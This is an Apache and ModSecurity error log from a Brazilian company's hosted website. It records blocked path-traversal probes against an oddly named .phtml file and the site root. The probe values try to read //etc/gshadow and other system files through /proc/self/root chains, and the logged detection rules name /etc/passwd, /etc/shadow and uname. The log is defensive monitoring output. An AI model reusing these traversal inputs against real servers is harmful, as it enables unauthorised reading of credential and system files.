[Thu Mar 19 19:04:31.626323 2026] [:error] [pid 21563:tid 140411666392832] [client 57.141.18.2:37988] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy70pm7ZmxKZTM4bZxnAAAA4k"]
[Thu Mar 19 19:04:32.836708 2026] [:error] [pid 14269:tid 140411666392832] [client 57.141.18.95:38024] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy8AbLMZ6AikZjR9WHjAAAAAk"]
[Thu Mar 19 19:04:33.234356 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.5:38032] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.pwd.lock"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy8RCii7xarUs8iHYWwAAAAgM"]
[Thu Mar 19 19:04:34.127612 2026] [:error] [pid 7545:tid 140411666392832] [client 57.141.18.22:38054] [client 57.141.18.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pkcs11"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy8n8B84UptSoTJtY6kgAAAYk"]
[Thu Mar 19 19:04:34.639397 2026] [:error] [pid 21219:tid 140411607643904] [client 57.141.18.81:38064] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ethertypes"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy8vXLqtnMIWvjpaJKSQAAApA"]
[Thu Mar 19 19:04:38.211288 2026] [:error] [pid 26799:tid 140411716749056] [client 57.141.18.73:38164] [client 57.141.18.73] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy9ta6ubjKNq_cu4aAxgAAA0M"]
[Thu Mar 19 19:04:38.779943 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.29:38172] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ntp.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy9uoXxyEfFpUF8f85pgAAAUQ"]
[Thu Mar 19 19:04:41.029491 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.26:38224] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy-fqxLDW4GITHUkSUCAAAAQY"]
[Thu Mar 19 19:04:42.555763 2026] [:error] [pid 20435:tid 140411590858496] [client 57.141.18.78:38266] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/protocols"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy-pJaM1-0uhhUQJNEyAAAAJI"]
[Thu Mar 19 19:04:42.990763 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.68:38274] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy-k1ujooLWdUDGy4AowAAAFM"]
[Thu Mar 19 19:04:43.383802 2026] [:error] [pid 19655:tid 140411548894976] [client 57.141.18.18:38282] [client 57.141.18.18] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy-01ujooLWdUDGy4ApAAAAFc"]
[Thu Mar 19 19:04:44.639066 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.72:38320] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/virc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy_Na6ubjKNq_cu4aAygAAA0w"]
[Thu Mar 19 19:04:47.138033 2026] [:error] [pid 19655:tid 140411590858496] [client 57.141.18.116:38394] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy_01ujooLWdUDGy4ApwAAAFI"]
[Thu Mar 19 19:04:47.508594 2026] [:error] [pid 19655:tid 140411590858496] [client 57.141.18.2:38408] [client 57.141.18.2] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxy_01ujooLWdUDGy4AqQAAAFI"]
[Thu Mar 19 19:04:51.399328 2026] [mime_magic:error] [pid 17653:tid 140411674785536] (70014)End of file found: [client 57.141.18.3:38506] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:04:53.162844 2026] [:error] [pid 26799:tid 140411649607424] [client 57.141.18.87:38546] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxzBda6ubjKNq_cu4aAzwAAA0s"]
[Thu Mar 19 19:04:54.121808 2026] [proxy_fcgi:error] [pid 8307:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35224] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:05:00.667421 2026] [:error] [pid 8307:tid 140411649607424] [client 57.141.18.97:38718] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxzDL-FhjpZGs9ba8qWogAAAws"]
[Thu Mar 19 19:05:04.961594 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.54:38786] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxzEPqxLDW4GITHUkSUFAAAARI"]
[Thu Mar 19 19:05:05.058913 2026] [:error] [pid 30077:tid 140411708356352] [client 57.141.18.29:38578] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxzEfu8EFLIOrSqIpvUFAAAAkQ"]
[Thu Mar 19 19:05:27.135693 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36004] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:05:34.564622 2026] [:error] [pid 7235:tid 140411590858496] [client 57.141.18.23:39254] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inittab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxzLvqxLDW4GITHUkSUKQAAARI"]
[Thu Mar 19 19:05:41.590595 2026] [:error] [pid 20435:tid 140411699963648] [client 57.141.18.30:39144] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxzNZJaM1-0uhhUQJNE6QAAAIU"]
[Thu Mar 19 19:05:45.423238 2026] [:error] [pid 30077:tid 140411708356352] [client 57.141.18.78:39476] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxzOfu8EFLIOrSqIpvUGwAAAkQ"]
[Thu Mar 19 19:05:46.515286 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:35028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxzOgbLMZ6AikZjR9WHqgAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 19:05:52.817459 2026] [:error] [pid 14269:tid 140411708356352] [client 57.141.18.124:39260] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxzQAbLMZ6AikZjR9WHrAAAAAQ"]
[Thu Mar 19 19:05:58.341099 2026] [:error] [pid 14269:tid 140411708356352] [client 74.7.228.61:56496] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abxzRgbLMZ6AikZjR9WHrgAAAAQ"]
[Thu Mar 19 19:05:59.093895 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:37122] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:06:20.232408 2026] [mime_magic:error] [pid 14269:tid 140411565680384] (70014)End of file found: [client 57.141.18.26:40372] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 19:06:21.133807 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37764] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:06:29.444437 2026] [:error] [pid 14269:tid 140411666392832] [client 74.7.243.128:40670] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxzZQbLMZ6AikZjR9WHwQAAAAk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 19:06:32.421632 2026] [core:alert] [pid 14269:tid 140411708356352] [client 57.141.18.117:40702] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 19:06:44.133811 2026] [proxy_fcgi:error] [pid 30077:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:38372] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:06:46.147040 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:41120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxzduoXxyEfFpUF8f85vgAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 19:07:03.800795 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:45350] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxzh9a6ubjKNq_cu4aBAwAAA1Q"], referer: 